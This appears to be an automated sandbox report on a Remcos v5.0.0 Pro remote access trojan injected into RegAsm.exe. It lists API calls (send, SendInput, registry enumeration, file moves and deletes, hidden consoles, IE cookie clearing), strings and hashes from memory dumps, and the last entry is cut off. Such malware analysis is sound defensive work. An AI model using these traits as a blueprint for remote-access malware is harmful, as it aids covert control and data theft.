                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                        • String ID: @5U$dMG$|MG
                                                                        • API String ID: 1356121797-2413048017
                                                                        • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                                        • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                                                        • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                                        • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                                                          • Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
                                                                          • Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
                                                                          • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                                                        • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                                                        • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                                                        • TranslateMessage.USER32(?), ref: 0041D4E9
                                                                        • DispatchMessageA.USER32 ref: 0041D4F3
                                                                        • GetMessageA.USER32 ref: 0041D500
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                        • String ID: Remcos
                                                                        • API String ID: 1970332568-165870891
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
• _memcmp.LIBVCRUNTIME ref: 00445423
• _free.LIBCMT ref: 00445494
• _free.LIBCMT ref: 004454AD
• _free.LIBCMT ref: 004454DF
• _free.LIBCMT ref: 004454E8
• _free.LIBCMT ref: 004454F4
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free$ErrorLast$_abort_memcmp
• String ID: C
• API String ID: 1679612858-1037565863
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID: tcp$udp
• API String ID: 0-3725065008
APIs
• __Init_thread_footer.LIBCMT ref: 004018BE
• ExitThread.KERNEL32 ref: 004018F6
• waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
• String ID: PkG$XMG$NG$NG
• API String ID: 1649129571-3151166067
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
• WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• CloseHandle.KERNEL32(00000000), ref: 00407A4D
• MoveFileW.KERNEL32 ref: 00407A6A
• CloseHandle.KERNEL32(00000000), ref: 00407A95
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
• String ID: .part
• API String ID: 1303771098-3499674018
APIs
  • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
  • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
  • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
• _wcslen.LIBCMT ref: 0041B763
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
• String ID: .exe$8SG$@5U$http\shell\open\command$program files (x86)\$program files\
• API String ID: 3286818993-1912118750
APIs
• AllocConsole.KERNEL32 ref: 0041CDA4
• GetConsoleWindow.KERNEL32 ref: 0041CDAA
• ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
• SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Console$Window$AllocOutputShow
• String ID: Remcos v$5.0.0 Pro$CONOUT$
• API String ID: 4067487056-2278869229
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID: @5U$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-R2I0JW$`2U
• API String ID: 0-2935759176
APIs
• SendInput.USER32(00000001,?,0000001C), ref: 004199CC
• SendInput.USER32(00000001,?,0000001C), ref: 004199ED
• SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
• SendInput.USER32(00000001,?,0000001C), ref: 00419A21
• SendInput.USER32(00000001,?,0000001C), ref: 00419A37
• SendInput.USER32(00000001,?,0000001C), ref: 00419A54
• SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
• SendInput.USER32(00000001,?,0000001C), ref: 00419A8B
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: InputSend
• String ID:
• API String ID: 3431551938-0
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: __freea$__alloca_probe_16_free
• String ID: a/p$am/pm$zD
• API String ID: 2936374016-2723203690
APIs
• RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
• RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B
Strings
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Enum$InfoQueryValue
• String ID: [regsplt]$xUG$TG
• API String ID: 3554306468-1165877943
APIs
• GetConsoleCP.KERNEL32 ref: 0044B3FE
• __fassign.LIBCMT ref: 0044B479
• __fassign.LIBCMT ref: 0044B494
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
• WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
• WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512
Memory Dump Source
• Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
                                                                        • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                        • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                                                        • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                        • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID: D[E$D[E
                                                                        • API String ID: 269201875-3695742444
                                                                        • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                        • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                                                        • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                        • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                                                        APIs
                                                                        • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                        • __fassign.LIBCMT ref: 1000954F
                                                                        • __fassign.LIBCMT ref: 1000956A
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                        • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                        • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                        • String ID:
                                                                        • API String ID: 1324828854-0
                                                                        • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                        • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                        • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                        • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32 ref: 00413D46
                                                                          • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                                          • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00413EB4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumInfoOpenQuerysend
                                                                        • String ID: xUG$NG$NG$TG
                                                                        • API String ID: 3114080316-2811732169
                                                                        • Opcode ID: 8cc426b5a18ff941664b475a4e5743ade2d40f1813d98070b9e600a2b8e76d58
                                                                        • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                                                        • Opcode Fuzzy Hash: 8cc426b5a18ff941664b475a4e5743ade2d40f1813d98070b9e600a2b8e76d58
                                                                        • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                                                        APIs
                                                                        • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                        • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                        • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 1170836740-1018135373
                                                                        • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                        • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                        • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                        • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                        APIs
                                                                          • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                          • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                                                          • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                                                        • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                        • API String ID: 1133728706-4073444585
                                                                        • Opcode ID: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
                                                                        • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                                                        • Opcode Fuzzy Hash: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
                                                                        • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b15328f38de36e2236e67be376e02f2a3afc52644fcc3b23babb247561bddb00
                                                                        • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                                                        • Opcode Fuzzy Hash: b15328f38de36e2236e67be376e02f2a3afc52644fcc3b23babb247561bddb00
                                                                        • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C477
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseHandle$CreatePointerWrite
                                                                        • String ID: hpF
                                                                        • API String ID: 1852769593-151379673
                                                                        • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                        • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                                                        • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                                        • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                                                        APIs
                                                                          • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                                                        • _free.LIBCMT ref: 00450F48
                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                        • _free.LIBCMT ref: 00450F53
                                                                        • _free.LIBCMT ref: 00450F5E
                                                                        • _free.LIBCMT ref: 00450FB2
                                                                        • _free.LIBCMT ref: 00450FBD
                                                                        • _free.LIBCMT ref: 00450FC8
                                                                        • _free.LIBCMT ref: 00450FD3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                        • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                                                        • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                        • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                                                        APIs
                                                                          • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                        • _free.LIBCMT ref: 100092AB
                                                                          • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                          • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                        • _free.LIBCMT ref: 100092B6
                                                                        • _free.LIBCMT ref: 100092C1
                                                                        • _free.LIBCMT ref: 10009315
                                                                        • _free.LIBCMT ref: 10009320
                                                                        • _free.LIBCMT ref: 1000932B
                                                                        • _free.LIBCMT ref: 10009336
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                        • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                        • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                        • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                                                        • int.LIBCPMT ref: 00411183
                                                                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                        • std::_Facet_Register.LIBCPMT ref: 004111C3
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                        • String ID: (mG
                                                                        • API String ID: 2536120697-4059303827
                                                                        • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                                        • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
